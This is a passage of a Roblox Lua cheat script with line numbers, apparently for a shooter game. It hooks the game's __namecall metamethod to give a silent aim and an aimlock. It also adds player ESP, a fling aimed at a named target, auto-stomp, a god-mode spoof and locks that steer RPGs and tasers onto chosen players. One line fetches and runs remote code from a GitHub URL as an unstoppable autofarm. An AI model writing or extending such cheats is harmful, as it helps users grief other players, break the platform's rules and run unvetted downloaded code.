  1945. elseif key:lower() == "a" then
  1946. ctrl.l = 0
  1947. elseif key:lower() == "d" then
  1948. ctrl.r = 0
  1949. end
  1950. end)
  1951. Fly()
  1952. end
  1953. end)
  1954.  
  1955. Fling.MouseButton1Click:Connect(function()
  1956. if Fling.Text == 'Fling' then
  1957. Fling.Text = 'Unfling'
  1958. local Loop
  1959. local OldFlingPos = player.Character.HumanoidRootPart.Position
  1960. local loopFunction = function()
  1961. local success,err = pcall(function()
  1962. local FlingEnemy = Players:FindFirstChild(TargetTextbox.Text).Character
  1963. if FlingEnemy and player.Character then
  1964. FlingTorso = FlingEnemy.UpperTorso
  1965. local dis = 3.85
  1966. local increase = 6
  1967. if FlingEnemy.Humanoid.MoveDirection.X < 0 then
  1968. xchange = -increase
  1969. elseif FlingEnemy.Humanoid.MoveDirection.X > 0 then
  1970. xchange = increase
  1971. else
  1972. xchange = 0
  1973. end
  1974. if FlingEnemy.Humanoid.MoveDirection.Z < 0 then
  1975. zchange = -increase
  1976. elseif FlingEnemy.Humanoid.MoveDirection.Z > 0 then
  1977. zchange = increase
  1978. else
  1979. zchange = 0
  1980. end
  1981. if player.Character then
  1982. player.Character:FindFirstChildWhichIsA('Humanoid'):ChangeState(11)
  1983. player.Character.HumanoidRootPart.CFrame = CFrame.new(FlingTorso.Position.X + math.random(-dis,dis) + xchange, FlingTorso.Position.Y, FlingTorso.Position.Z + math.random(-dis,dis) + zchange) * CFrame.Angles(math.rad(player.Character.HumanoidRootPart.Orientation.X + 350),math.rad(player.Character.HumanoidRootPart.Orientation.Y + 200),math.rad(player.Character.HumanoidRootPart.Orientation.Z + 240))
  1984. player.Character.HumanoidRootPart.Velocity = Vector3.new(500000,500000,500000)
  1985. end
  1986. end
  1987. end)
  1988. if err then
  1989. print('fling error : ' .. err)
  1990. end
  1991. end;
  1992. local Start = function()
  1993. OldFlingPos = player.Character.HumanoidRootPart.Position
  1994. Loop = game:GetService("RunService").Heartbeat:Connect(loopFunction);
  1995. end;
  1996. local Pause = function()
  1997. Loop:Disconnect()
  1998. local vectorZero = Vector3.new(0, 0, 0)
  1999. player.Character.PrimaryPart.Velocity = vectorZero
  2000. player.Character.PrimaryPart.RotVelocity = vectorZero
  2001. player.Character.HumanoidRootPart.CFrame = CFrame.new(OldFlingPos) * CFrame.Angles(math.rad(0),math.rad(137.92),math.rad(0))
  2002. end;
  2003. Start()
  2004. repeat wait() until Fling.Text == 'Fling'
  2005. Pause()
  2006. else
  2007. Fling.Text = 'Fling'
  2008. end
  2009. end)
  2010.  
  2011. ------------------------------------------------------------------------------------------------------------------------------------------------
  2012. ------------------------------------------------------------------------------------------------------------------------------------------------
  2013. ------------------------------------------------------------------------------------------------------------------------------------------------
  2014. ------------------------------------------------------------------------------------------------------------------------------------------------
  2015. ------------------------------------------------------------------------------------------------------------------------------------------------
  2016.  
  2017. coroutine.resume(coroutine.create(function()
  2018. RS.RenderStepped:Connect(function()
  2019. local success,err = pcall(function()
  2020. if AntiSlowColor.BackgroundColor3 == green and player.Character then
  2021. local DeletePart = player.Character.BodyEffects.Movement:FindFirstChild('NoJumping') or player.Character.BodyEffects.Movement:FindFirstChild('ReduceWalk') or player.Character.BodyEffects.Movement:FindFirstChild('NoWalkSpeed')
  2022. if DeletePart then DeletePart:Destroy() end
  2023. if player.Character.BodyEffects.Reload.Value == true then player.Character.BodyEffects.Reload.Value = false end
  2024. end
  2025. if CashAuraColor.BackgroundColor3 == green and player.Character then
  2026. for i,v in pairs(game:GetService('Workspace')['Ignored']['Drop']:GetChildren()) do
  2027. if v:IsA('Part') then
  2028. if (v.Position - player.Character.HumanoidRootPart.Position).Magnitude <= 12 then
  2029. fireclickdetector(v:FindFirstChild('ClickDetector'))
  2030. end
  2031. end
  2032. end
  2033. end
  2034. if AntiStompColor.BackgroundColor3 == green and player.Character then
  2035. if player.Character.BodyEffects['K.O'].Value == true then player.Character:Destroy() end
  2036. end
  2037. if AutoBlockColor.BackgroundColor3 == green and player.Character then
  2038. local forbidden = {'[RPG]','[SMG]','[TacticalShotgun]','[AK47]','[AUG]','[Glock]', '[Shotgun]','[Flamethrower]','[Silencer]','[AR]','[Revolver]','[SilencerAR]','[LMG]','[P90]','[DrumGun]','[Double-Barrel SG]','[Hamburger]','[Chicken]','[Pizza]','[Cranberry]','[Donut]','[Taco]','[Starblox Latte]','[BrownBag]','[Weights]','[HeavyWeights]'}
  2039. local Found = false
  2040. for _,v in pairs(game.Workspace.Players:GetChildren()) do
  2041. if (v.UpperTorso.Position - player.Character.HumanoidRootPart.Position).Magnitude <= MaxDistance then
  2042. if v.BodyEffects.Attacking.Value == true and not table.find(forbidden, v:FindFirstChildWhichIsA('Tool').Name ) and v.Name ~= player.Name then
  2043. Found = true
  2044. MainEvent:FireServer('Block', player.Name)
  2045. end
  2046. end
  2047. end
  2048. if Found == false and HoldingF == false then
  2049. if player.Character.BodyEffects:FindFirstChild('Block') then player.Character.BodyEffects.Block:Destroy() end
  2050. end
  2051. end
  2052. if AutoStompColor.BackgroundColor3 == green and player.Character then
  2053. MainEvent:FireServer('Stomp')
  2054. end
  2055. if AntiArrestColor.BackgroundColor3 == green and player.Character then
  2056. for _,v in pairs(game:GetService('Players'):GetChildren()) do
  2057. if v.Character and v.DataFolder.Officer.Value == 1 then
  2058. if (v.Character.HumanoidRootPart.Position - player.Character.HumanoidRootPart.Position).Magnitude <= 30 and player.Character.BodyEffects['K.O'].Value == true then
  2059. player.Character:Destroy()
  2060. end
  2061. end
  2062. end
  2063. end
  2064. if AutoDropColor.BackgroundColor3 == green and player.Character then
  2065. local DropAm = 10000
  2066. if player.DataFolder.Currency.Value > 10000 then
  2067. DropAm = '10000'
  2068. else
  2069. DropAm = tostring(player.DataFolder.Currency.Value)
  2070. end
  2071. local args = {
  2072. 'DropMoney',
  2073. DropAm
  2074. }
  2075. MainEvent:FireServer(unpack(args))
  2076. end
  2077. if RocketRideColor.BackgroundColor3 == green and player.Character then
  2078. local Rocket = game:GetService('Workspace'):FindFirstChild('Ignored'):FindFirstChild('MyLauncher')
  2079. if Rocket and COOLDOWN == true then
  2080. local RocketPart = game:GetService('Workspace'):FindFirstChild('Ignored'):FindFirstChild('RocketPart')
  2081. if not RocketPart then
  2082. local RocketPart = Instance.new('Part', game.Workspace.Ignored)
  2083. RocketPart.Name = 'RocketPart'
  2084. RocketPart.Anchored = true
  2085. RocketPart.CanCollide = true
  2086. RocketPart.Transparency = 1
  2087. RocketPart.Position = Vector3.new(Rocket.Position.X, Rocket.Position.Y + 1.4, Rocket.Position.Z)
  2088. player.Character.HumanoidRootPart.CFrame = CFrame.new(RocketPart.Position.X, RocketPart.Position.Y + 2, RocketPart.Position.Z) * CFrame.Angles(math.rad(player.Character.HumanoidRootPart.Orientation.X),math.rad(player.Character.HumanoidRootPart.Orientation.Y),math.rad(player.Character.HumanoidRootPart.Orientation.Z))
  2089. RIDING = true
  2090. else
  2091. RocketPart.Position = Vector3.new(Rocket.Position.X, Rocket.Position.Y + 1.4, Rocket.Position.Z)
  2092. player.Character.HumanoidRootPart.CFrame = CFrame.new(RocketPart.Position.X, RocketPart.Position.Y + 2.3, RocketPart.Position.Z) * CFrame.Angles(math.rad(player.Character.HumanoidRootPart.Orientation.X),math.rad(player.Character.HumanoidRootPart.Orientation.Y),math.rad(player.Character.HumanoidRootPart.Orientation.Z))
  2093. RIDING = true
  2094. end
  2095. else
  2096. for i,v in pairs(game:GetService('Workspace'):FindFirstChild('Ignored'):GetChildren()) do
  2097. if v.Name == 'RocketPart' then
  2098. v:Destroy()
  2099. end
  2100. RIDING = false
  2101. end
  2102. end
  2103. end
  2104. if AntiGrabColor.BackgroundColor3 == green and player.Character then
  2105. local GC = player.Character:FindFirstChild("GRABBING_CONSTRAINT")
  2106. if GC then
  2107. GC:Destroy()
  2108. wait(0.04)
  2109. player.Character:FindFirstChildWhichIsA('Humanoid').Sit = true
  2110. end
  2111. end
  2112. if HideUserColor.BackgroundColor3 == green and player.Character then
  2113. local WearingMask = player.Character:FindFirstChild('In-gameMask')
  2114. local Humanoid = player.Character:FindFirstChildWhichIsA('Humanoid')
  2115. if not WearingMask then
  2116. local OwnsMask = player.Character:FindFirstChild('Mask') or player.Backpack:FindFirstChild('Mask')
  2117. if OwnsMask then
  2118. local MaskInventory = player.Backpack:FindFirstChild('Mask')
  2119. if MaskInventory then
  2120. Humanoid:EquipTool(MaskInventory)
  2121. wait(0.1)
  2122. end
  2123. OwnsMask:Activate()
  2124. else
  2125. local ItemName = 'Mask'
  2126. local ItemCost = 60
  2127. local ClickDetector = game:GetService("Workspace").Ignored.Shop["[Paintball Mask] - $60"].ClickDetector
  2128. local Location = game:GetService("Workspace").Ignored.Shop["[Paintball Mask] - $60"].Head.Position
  2129. local function buy()
  2130. wait()
  2131. player.Character.HumanoidRootPart.CFrame = CFrame.new(Location)
  2132. fireclickdetector(ClickDetector)
  2133. if not player.Character.LeftHand:FindFirstChild('LeftWrist') then
  2134. player.Character.LeftHand.Position = player.Character.LeftLowerArm.Position
  2135. player.Character.RightHand.Position = player.Character.RightLowerArm.Position
  2136. end
  2137. end
  2138. repeat buy() until player.Backpack:FindFirstChild(ItemName) or player.DataFolder.Currency.Value <= ItemCost or player.Character:FindFirstChild(ItemName)
  2139. player.Character.HumanoidRootPart.CFrame = NamePos
  2140. if not player.Character.LeftHand:FindFirstChild('LeftWrist') then
  2141. player.Character.LeftHand.Position = player.Character.LeftLowerArm.Position
  2142. player.Character.RightHand.Position = player.Character.RightLowerArm.Position
  2143. end
  2144. end
  2145. else
  2146. local MaskVisible = player.Character:FindFirstChild('In-gameMask'):FindFirstChild('Handle')
  2147. if MaskVisible then
  2148. MaskVisible:Destroy()
  2149. end
  2150. end
  2151. end
  2152. if AntiEffectsColor.BackgroundColor3 == green and player.Character then
  2153. local Particle = player.Character.UpperTorso:FindFirstChild('ElectricuteParticle') or player.Character.UpperTorso:FindFirstChild('FlamethrowerFireParticle')
  2154. if Particle then Particle:Destroy() end
  2155. for i,v in pairs(player.Character:FindFirstChildWhichIsA('Humanoid'):GetPlayingAnimationTracks()) do
  2156. if v.Animation.AnimationId == 'rbxassetid://5641749824' then
  2157. v:Stop()
  2158. end
  2159. end
  2160. end
  2161. end)
  2162. end)
  2163. end))
  2164.  
  2165. QToTpColor.BackgroundColor3 = red
  2166. QToTp.MouseButton1Click:Connect(function()
  2167. if QToTpColor.BackgroundColor3 == red then
  2168. QToTpColor.BackgroundColor3 = green
  2169. else
  2170. QToTpColor.BackgroundColor3 = red
  2171. end
  2172. end)
  2173.  
  2174. AntiSlowColor.BackgroundColor3 = red
  2175. AntiSlow.MouseButton1Click:Connect(function()
  2176. if AntiSlowColor.BackgroundColor3 == red then
  2177. AntiSlowColor.BackgroundColor3 = green
  2178. else
  2179. AntiSlowColor.BackgroundColor3 = red
  2180. end
  2181. end)
  2182.  
  2183. CashAuraColor.BackgroundColor3 = red
  2184. CashAura.MouseButton1Click:Connect(function()
  2185. if CashAuraColor.BackgroundColor3 == red then
  2186. CashAuraColor.BackgroundColor3 = green
  2187. else
  2188. CashAuraColor.BackgroundColor3 = red
  2189. end
  2190. end)
  2191.  
  2192. HideBlockColor.BackgroundColor3 = red
  2193. HideBlock.MouseButton1Click:Connect(function()
  2194. if HideBlockColor.BackgroundColor3 == red then
  2195. HideBlockColor.BackgroundColor3 = green
  2196. else
  2197. HideBlockColor.BackgroundColor3 = red
  2198. end
  2199. end)
  2200.  
  2201. AntiStompColor.BackgroundColor3 = red
  2202. AntiStomp.MouseButton1Click:Connect(function()
  2203. if AntiStompColor.BackgroundColor3 == red then
  2204. AntiStompColor.BackgroundColor3 = green
  2205. else
  2206. AntiStompColor.BackgroundColor3 = red
  2207. end
  2208. end)
  2209.  
  2210. AutoBlockColor.BackgroundColor3 = red
  2211. AutoBlock.MouseButton1Click:Connect(function()
  2212. if AutoBlockColor.BackgroundColor3 == red then
  2213. AutoBlockColor.BackgroundColor3 = green
  2214. else
  2215. AutoBlockColor.BackgroundColor3 = red
  2216. end
  2217. end)
  2218.  
  2219. AutoStompColor.BackgroundColor3 = red
  2220. AutoStomp.MouseButton1Click:Connect(function()
  2221. if AutoStompColor.BackgroundColor3 == red then
  2222. AutoStompColor.BackgroundColor3 = green
  2223. else
  2224. AutoStompColor.BackgroundColor3 = red
  2225. end
  2226. end)
  2227.  
  2228. AntiArrestColor.BackgroundColor3 = red
  2229. AntiArrest.MouseButton1Click:Connect(function()
  2230. if AntiArrestColor.BackgroundColor3 == red then
  2231. AntiArrestColor.BackgroundColor3 = green
  2232. else
  2233. AntiArrestColor.BackgroundColor3 = red
  2234. end
  2235. end)
  2236.  
  2237. AutoDropColor.BackgroundColor3 = red
  2238. AutoDrop.MouseButton1Click:Connect(function()
  2239. if AutoDropColor.BackgroundColor3 == red then
  2240. AutoDropColor.BackgroundColor3 = green
  2241. else
  2242. AutoDropColor.BackgroundColor3 = red
  2243. end
  2244. end)
  2245.  
  2246. HideUserColor.BackgroundColor3 = red
  2247. HideUser.MouseButton1Click:Connect(function()
  2248. if HideUserColor.BackgroundColor3 == red then
  2249. HideUserColor.BackgroundColor3 = green
  2250. NamePos = player.Character.HumanoidRootPart.CFrame
  2251. else
  2252. HideUserColor.BackgroundColor3 = red
  2253. end
  2254. end)
  2255.  
  2256. AntiBagColor.BackgroundColor3 = red
  2257. AntiBag.MouseButton1Click:Connect(function()
  2258. if AntiBagColor.BackgroundColor3 == red then
  2259. AntiBagColor.BackgroundColor3 = green
  2260. else
  2261. AntiBagColor.BackgroundColor3 = red
  2262. end
  2263. end)
  2264.  
  2265. AltArmorColor.BackgroundColor3 = red
  2266. AltArmor.MouseButton1Click:Connect(function()
  2267. if AltArmorColor.BackgroundColor3 == red then
  2268. AltArmorColor.BackgroundColor3 = green
  2269. else
  2270. AltArmorColor.BackgroundColor3 = red
  2271. end
  2272. end)
  2273.  
  2274. RocketRideColor.BackgroundColor3 = red
  2275. RocketRide.MouseButton1Click:Connect(function()
  2276. if RocketRideColor.BackgroundColor3 == red then
  2277. RocketRideColor.BackgroundColor3 = green
  2278. else
  2279. RocketRideColor.BackgroundColor3 = red
  2280. end
  2281. end)
  2282.  
  2283. AntiGrabColor.BackgroundColor3 = red
  2284. AntiGrab.MouseButton1Click:Connect(function()
  2285. if AntiGrabColor.BackgroundColor3 == red then
  2286. AntiGrabColor.BackgroundColor3 = green
  2287. else
  2288. AntiGrabColor.BackgroundColor3 = red
  2289. end
  2290. end)
  2291.  
  2292. AntiEffectsColor.BackgroundColor3 = red
  2293. AntiEffects.MouseButton1Click:Connect(function()
  2294. if AntiEffectsColor.BackgroundColor3 == red then
  2295. AntiEffectsColor.BackgroundColor3 = green
  2296. player.PlayerGui.Framework.FBAnimation.Name = 'yea'
  2297. else
  2298. AntiEffectsColor.BackgroundColor3 = red
  2299. player.PlayerGui.Framework.yea.Name = 'FBAnimation'
  2300. end
  2301. end)
  2302.  
  2303. ------------------------------------------------------------------------------------------------------------------------------------------------
  2304. ------------------------------------------------------------------------------------------------------------------------------------------------
  2305. ------------------------------------------------------------------------------------------------------------------------------------------------
  2306. ------------------------------------------------------------------------------------------------------------------------------------------------
  2307. ------------------------------------------------------------------------------------------------------------------------------------------------
  2308.  
  2309. --Rpg Variables--
  2310. DS = 75
  2311. DT = 5
  2312. RpgTimer = DS
  2313. Distance = DT
  2314. RPGTarget = 'None'
  2315. -----------------
  2316.  
  2317.  
  2318. coroutine.resume(coroutine.create(function()
  2319. RS.RenderStepped:Connect(function()
  2320. local success, err = pcall(function()
  2321. if Spin.Text == 'Unspin' and player.Character then
  2322. player.Character.HumanoidRootPart.CFrame = player.Character.HumanoidRootPart.CFrame * CFrame.Angles(0, math.rad(50), 0)
  2323. end
  2324. if MoneyESP.Text == 'UnmoneyESP' then
  2325. for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
  2326. if v.Name == 'MoneyDrop' then
  2327. v.BillboardGui.AlwaysOnTop = true
  2328. v.BillboardGui.Size = UDim2.new(0,25,0,25)
  2329. end
  2330. end
  2331. end
  2332. if Esp.Text == 'Unesp' then
  2333. for _,v in pairs(Players:GetChildren()) do
  2334. if v.Character then
  2335. if not v.Character.UpperTorso:FindFirstChild('ESP') then
  2336. local ESP = Instance.new('BillboardGui', v.Character.UpperTorso)
  2337. ESP.StudsOffset = Vector3.new(0,3,0)
  2338. ESP.Size = UDim2.new(4,0,1,0)
  2339. ESP.AlwaysOnTop = true
  2340. ESP.Name = 'ESP'
  2341. local TextLabel = Instance.new('TextLabel', ESP)
  2342. TextLabel.Text = (v.Name ..' | ' .. v.DisplayName)
  2343. TextLabel.BackgroundTransparency = 1
  2344. TextLabel.Size = UDim2.new(1,0,1,0)
  2345. TextLabel.TextColor3 = green
  2346. end
  2347. end
  2348. end
  2349. end
  2350. if Aimlocked ~= nil and Aimlock.Text == 'Unaimlock' and player.Character and Mouse2Down == true then
  2351. local enemy = Aimlocked.Character
  2352. if enemy then
  2353. local pingvalue = game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString()
  2354. local split = string.split(pingvalue,'(')
  2355. local ping = tonumber(split[1])
  2356. local xchange
  2357. local zchange
  2358. if ping < 70 then
  2359. increase = 0.27
  2360. elseif ping < 140 then
  2361. increase = 0.42
  2362. elseif ping < 200 then
  2363. increase = 0.7
  2364. elseif ping < 350 then
  2365. increase = 1.2
  2366. else
  2367. increase = 1.6
  2368. end
  2369. if enemy.Humanoid.MoveDirection.X < 0 then
  2370. xchange = -increase
  2371. elseif enemy.Humanoid.MoveDirection.X > 0 then
  2372. xchange = increase
  2373. else
  2374. xchange = 0
  2375. end
  2376. if enemy.Humanoid.MoveDirection.Z < 0 then
  2377. zchange = -increase
  2378. elseif enemy.Humanoid.MoveDirection.Z > 0 then
  2379. zchange = increase
  2380. else
  2381. zchange = 0
  2382. end
  2383. pos = Vector3.new(enemy.Head.Position.X + enemy.Humanoid.MoveDirection.X + xchange, enemy.Head.Position.Y, enemy.Head.Position.Z + enemy.Humanoid.MoveDirection.Z + zchange)
  2384. end
  2385. else
  2386. pos = mouse.Hit.p
  2387. end
  2388. if RPGTarget ~= nil then
  2389. local Launcher = game:GetService('Workspace'):FindFirstChild('Ignored'):FindFirstChild('Launcher') or game:GetService('Workspace'):FindFirstChild('Ignored'):FindFirstChild('MyLauncher')
  2390. local TargetRPG1 = game:GetService('Workspace').Players:FindFirstChild(RPGTarget)
  2391. if Launcher and TargetRPG1 then
  2392. local TargetRPG = TargetRPG1:FindFirstChild('HumanoidRootPart')
  2393. if TargetRPG then
  2394. if RpgTimer >= 0 then
  2395. Launcher.CFrame = CFrame.new(TargetRPG.Position.X, TargetRPG.Position.Y + 5, TargetRPG.Position.Z)
  2396. RpgTimer = RpgTimer - 1
  2397. else
  2398. Launcher.CFrame = CFrame.new(TargetRPG.Position.X, TargetRPG.Position.Y + Distance, TargetRPG.Position.Z)
  2399. Distance = Distance - 1
  2400. end
  2401. else
  2402. RpgTimer = DS
  2403. Distance = DT
  2404. end
  2405. else
  2406. RpgTimer = DS
  2407. Distance = DT
  2408. end
  2409. end
  2410. if TazerTarget ~= nil then
  2411. if player.Character:FindFirstChild('[Taser]') then
  2412. local Part = player.Character['[Taser]']:FindFirstChild('Handle'):FindFirstChild('Part')
  2413. if Part then
  2414. local FindPlayer = game.Workspace.Players:FindFirstChild(TazerTarget):FindFirstChild('UpperTorso') or game.Workspace:FindFirstChild(TazerTarget):FindFirstChild('UpperTorso')
  2415. if FindPlayer then
  2416. Part.Position = FindPlayer.Position
  2417. end
  2418. end
  2419. end
  2420. end
  2421. if GrenadeTarget ~= nil then
  2422. print('lookin')
  2423. local Handle = game.Workspace['Ignored']:FindFirstChild('Handle')
  2424. local FindPlayer = Players:FindFirstChild(GrenadeTarget)
  2425. if Handle and FindPlayer then
  2426. if FindPlayer.Character then
  2427. Handle.Position = FindPlayer.Character.UpperTorso.Position
  2428. end
  2429. end
  2430. end
  2431. end)
  2432. if err then print(err) end
  2433. end)
  2434. end))
  2435.  
  2436.  
  2437. Camera = workspace:FindFirstChildWhichIsA('Camera')
  2438. target = false
  2439. Aimlocked = nil
  2440.  
  2441. local features = {
  2442. silentaim = true;
  2443. fov = 500;
  2444. }
  2445.  
  2446. function getnearest()
  2447. local nearestmagnitude = math.huge
  2448. local nearestenemy = nil
  2449. local vector = nil
  2450. for i,v in next, Players:GetChildren() do
  2451. if v ~= Players.LocalPlayer then
  2452. if v.Character and v.Character:FindFirstChild("HumanoidRootPart") and v.Character:FindFirstChild("Humanoid") and v.Character.Humanoid.Health > 0 and v.Character.BodyEffects['K.O'].Value == false then
  2453. local vector, onScreen = Camera:WorldToScreenPoint(v.Character["HumanoidRootPart"].Position)
  2454. if onScreen then
  2455. local ray = Ray.new(
  2456. Camera.CFrame.p,
  2457. (v.Character["Head"].Position-Camera.CFrame.p).unit*500
  2458. )
  2459. local ignore = {
  2460. player.Character,
  2461. }
  2462. local hit,position,normal=workspace:FindPartOnRayWithIgnoreList(ray,ignore)
  2463. if hit and hit:FindFirstAncestorOfClass("Model") and Players:FindFirstChild(hit:FindFirstAncestorOfClass("Model").Name)then
  2464. local magnitude = (Vector2.new(mouse.X, mouse.Y) - Vector2.new(vector.X, vector.Y)).magnitude
  2465. if magnitude < nearestmagnitude and magnitude <= features["fov"] then
  2466. nearestenemy = v
  2467. nearestmagnitude = magnitude
  2468. end
  2469. end
  2470. end
  2471. end
  2472. end
  2473. end
  2474. return nearestenemy
  2475. end
  2476.  
  2477.  
  2478. local meta = getrawmetatable(game)
  2479. setreadonly(meta, false)
  2480. local oldNamecall = meta.__namecall
  2481. meta.__namecall = newcclosure(function(...)
  2482. local method = getnamecallmethod()
  2483. local args = {...}
  2484. if string.find(method,'Ray') then
  2485. if target then
  2486. args[2] = Ray.new(workspace.CurrentCamera.CFrame.Position, (target + Vector3.new(0,(workspace.CurrentCamera.CFrame.Position-target).Magnitude/500,0) - workspace.CurrentCamera.CFrame.Position).unit * 500)
  2487. end
  2488. end
  2489. return oldNamecall(unpack(args))
  2490. end)
  2491.  
  2492.  
  2493. local mt = getrawmetatable(game) -- aimlok
  2494. pos = Vector3.new(0,0,0)
  2495. local old = mt.__namecall
  2496. setreadonly(mt,false)
  2497. mt.__namecall = newcclosure(function(self, ...)
  2498. local args = {...}
  2499. if getnamecallmethod() == 'FireServer' and self.Name == 'MainEvent' then
  2500. if tostring(args[1]) == 'UpdateMousePos' then
  2501. if Aimlocked ~= nil then
  2502. -- if Aimlock.Text == 'Unaimlock' then
  2503. args[2] = pos
  2504. --end
  2505. end
  2506. end
  2507. end
  2508. return old(self, unpack(args))
  2509. end)
  2510.  
  2511. mouse.Button2Down:Connect(function()
  2512. Mouse2Down = true
  2513. while Mouse2Down == true and Aimlock.Text == 'Unaimlock' do
  2514. wait()
  2515. Aimlocked = getnearest()
  2516. end
  2517. end)
  2518. mouse.Button2Up:Connect(function()
  2519. Mouse2Down = false
  2520. end)
  2521.  
  2522.  
  2523. Invisible.MouseButton1Click:Connect(function()
  2524. OldInvisCFrame = player.Character.HumanoidRootPart.CFrame
  2525. player.Character.HumanoidRootPart.CFrame = CFrame.new(318.499, 93.825, -919.513)
  2526. wait(0.1)
  2527. player.Character:BreakJoints()
  2528. wait(0.1)
  2529. player.Character.HumanoidRootPart.CFrame = OldInvisCFrame
  2530. end)
  2531.  
  2532. Spin.MouseButton1Click:Connect(function()
  2533. if Spin.Text == 'Spin' then
  2534. Spin.Text = 'Unspin'
  2535. else
  2536. Spin.Text = 'Spin'
  2537. end
  2538. end)
  2539.  
  2540. Users.MouseButton1Click:Connect(function()
  2541. for i,v in pairs(game.Workspace.Players:GetChildren()) do
  2542. v:FindFirstChildWhichIsA('Humanoid').DisplayDistanceType = 'Subject'
  2543. end
  2544. notify('Showing masked users names', '', 3)
  2545. end)
  2546.  
  2547. MoneyESP.MouseButton1Click:Connect(function()
  2548. if MoneyESP.Text == 'MoneyESP' then
  2549. MoneyESP.Text = 'UnmoneyESP'
  2550. else
  2551. MoneyESP.Text = 'MoneyESP'
  2552. for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
  2553. if v.Name == 'MoneyDrop' then
  2554. v.BillboardGui.AlwaysOnTop = false
  2555. v.BillboardGui.Size = UDim2.new(1,0,1,0)
  2556. end
  2557. end
  2558. end
  2559. end)
  2560.  
  2561. Esp.MouseButton1Click:Connect(function()
  2562. if Esp.Text == 'Esp' then
  2563. Esp.Text = 'Unesp'
  2564. else
  2565. Esp.Text = 'Esp'
  2566. for _,v in pairs(Players:GetChildren()) do
  2567. if v.Character then
  2568. if v.Character.UpperTorso:FindFirstChild('ESP') then
  2569. v.Character.UpperTorso:FindFirstChild('ESP'):Destroy()
  2570. end
  2571. end
  2572. end
  2573. end
  2574. end)
  2575.  
  2576. HighTool.MouseButton1Click:Connect(function()
  2577. if player.Character:FindFirstChildWhichIsA('Tool') then
  2578. player.Character:FindFirstChildWhichIsA('Tool').Grip = CFrame.new(0, -12, 0, 1, 0, 0, 0, 1, 0, 0, 0, -1)
  2579. else
  2580. notify('HighTool Error', 'you have to be holding a tool', 5)
  2581. end
  2582. end)
  2583.  
  2584. LastingBullets.MouseButton1Click:Connect(function()
  2585. if player.Character:FindFirstChildWhichIsA('Tool') then
  2586. if player.Character:FindFirstChildWhichIsA('Tool'):FindFirstChild('Handle'):FindFirstChildWhichIsA('BillboardGui') then
  2587. player.Character:FindFirstChildWhichIsA('Tool'):FindFirstChild('Handle'):FindFirstChildWhichIsA('BillboardGui'):Destroy()
  2588. else
  2589. notify('LastingBullets Error', 'you have to be holding a gun', 5)
  2590. end
  2591. else
  2592. notify('LastingBullets Error', 'you have to be holding a gun', 5)
  2593. end
  2594. end)
  2595.  
  2596. Aimlock.MouseButton1Click:Connect(function()
  2597. if Aimlock.Text == 'Aimlock' then
  2598. Aimlock.Text = 'Unaimlock'
  2599. notify('Aimlock Enabled', 'you lock while holding rmb', 5)
  2600. else
  2601. Aimlock.Text = 'Aimlock'
  2602. end
  2603. end)
  2604.  
  2605. AutoFarmWarning = false
  2606. Autofarm.MouseButton1Click:Connect(function()
  2607. if AutoFarmWarning == false then
  2608. AutoFarmWarning = true
  2609. notify('Autofarm Warning', 'press again to begin autofarming, this CANNOT be stopped', 10)
  2610. else
  2611. notify('Starting Autofarm', ':D', 5)
  2612. loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SwagAutofarm"))()
  2613. end
  2614. end)
  2615.  
  2616. Unban.MouseButton1Click:Connect(function()
  2617. local localPlayer = game:GetService('Players').LocalPlayer;
  2618. local localCharacter = localPlayer.Character;
  2619. localCharacter:FindFirstChildOfClass('Humanoid').Health = 0;
  2620. localCharacter:ClearAllChildren()
  2621. local newCharacter = localPlayer.CharacterAdded:Wait();
  2622. local spoofFolder = Instance.new('Folder');
  2623. spoofFolder.Name = 'FULLY_LOADED_CHAR';
  2624. spoofFolder.Parent = newCharacter;
  2625. newCharacter:WaitForChild('BodyEffects').Dead:Destroy();
  2626. local spoofValue = Instance.new('BoolValue', newCharacter.BodyEffects);
  2627. spoofValue.Name = 'Dead';
  2628. end)
  2629.  
  2630. FullGod.MouseButton1Click:Connect(function()
  2631. local localPlayer = game:GetService('Players').LocalPlayer;
  2632. local localCharacter = localPlayer.Character;
  2633. localCharacter:FindFirstChildOfClass('Humanoid').Health = 0;
  2634. localCharacter:ClearAllChildren()
  2635. local newCharacter = localPlayer.CharacterAdded:Wait();
  2636. local spoofFolder = Instance.new('Folder');
  2637. spoofFolder.Name = 'FULLY_LOADED_CHAR';
  2638. spoofFolder.Parent = newCharacter;
  2639. newCharacter:WaitForChild('BodyEffects').BreakingParts:Destroy();
  2640. local spoofValue = Instance.new('BoolValue', newCharacter.BodyEffects);
  2641. spoofValue.Name = 'Dead';
  2642. end)
  2643.  
  2644. RpgLock.MouseButton1Click:Connect(function()
  2645. local RpgTool = Instance.new('Tool', player.Backpack)
  2646. RpgTool.ToolTip = 'Click a player to rpg lock them'
  2647. RpgTool.CanBeDropped = false
  2648. RpgTool.RequiresHandle = false
  2649. RpgTool.Name = 'Rpg Lock'
  2650.  
  2651. RpgTool.Activated:Connect(function()
  2652. local LowerTorso = mouse.Target.Parent:FindFirstChild('LowerTorso')
  2653. if not LowerTorso then
  2654. LowerTorso = mouse.Target.Parent.Parent:FindFirstChild('LowerTorso')
  2655. end
  2656. if LowerTorso then
  2657. if LowerTorso.Parent.Name == 'SpecialParts' then
  2658. RPGTarget = LowerTorso.Parent.Parent.Parent.Name
  2659. else
  2660. RPGTarget = LowerTorso.Parent.Name
  2661. end
  2662. notify('Rpg locked onto', RPGTarget, 3)
  2663. else
  2664. RPGTarget = nil
  2665. notify('Rpg unlocked', '', 3)
  2666. end
  2667. end)
  2668. end)
  2669.  
  2670. TazerTarget = nil
  2671.  
  2672. TaserLock.MouseButton1Click:Connect(function()
  2673. local TazerTool = Instance.new('Tool', player.Backpack)
  2674. TazerTool.ToolTip = 'Click a player to tazer lock them'
  2675. TazerTool.CanBeDropped = false
  2676. TazerTool.RequiresHandle = false
  2677. TazerTool.Name = 'Tazer Lock'
  2678.  
  2679. TazerTool.Activated:Connect(function()
  2680. local LowerTorso = mouse.Target.Parent:FindFirstChild('LowerTorso')
  2681. if not LowerTorso then
  2682. LowerTorso = mouse.Target.Parent.Parent:FindFirstChild('LowerTorso')
  2683. end
  2684. if LowerTorso then
  2685. if LowerTorso.Parent.Name == 'SpecialParts' then
  2686. TazerTarget = LowerTorso.Parent.Parent.Parent.Name
  2687. else
  2688. TazerTarget = LowerTorso.Parent.Name
  2689. end
